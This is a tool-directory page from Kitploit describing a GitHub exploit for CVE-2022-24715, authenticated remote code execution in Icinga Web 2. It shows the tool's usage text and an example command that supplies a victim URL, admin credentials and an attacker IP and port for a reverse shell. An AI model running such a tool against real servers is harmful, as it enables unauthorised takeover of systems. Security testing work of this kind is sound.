Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2022-24715 — Icinga Web 2 - Authenticated Remote Code Execution <2.8.6, <2.9.6, <2.10 | Kitploit
Tools/GitHubGitHub/cxdxnt/cve-2022-24715
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubcxdxnt/cve-2022-24715

CVE-2022-24715

Icinga Web 2 - Authenticated Remote Code Execution <2.8.6, <2.9.6, <2.10

View Repository
3 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Icinga Web 2 - Authenticated Remote Code Execution <2.8.6, <2.9.6, <2.10

Remote command execution

asciicast

Reverse shell

asciicast

Usage

root@kitploit:~
usage: exploit.py [-h] -u URL -U USER -P PASSWORD -i IP -p PORT

Welcome.

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Insert URL http://ip_victima
  -U USER, --user USER  Insert user -U user
  -P PASSWORD, --password PASSWORD
                        Insert password -P password
  -i IP, --ip IP        Insert IP_ATTACK -i IP
  -p PORT, --port PORT  Insert PORT_ATTACK -p PORT

example

root@kitploit:~
python3 exploit.py -u http://localhost -U admin -P admin123 -i 192.168.1.1 -p 443
Download Tool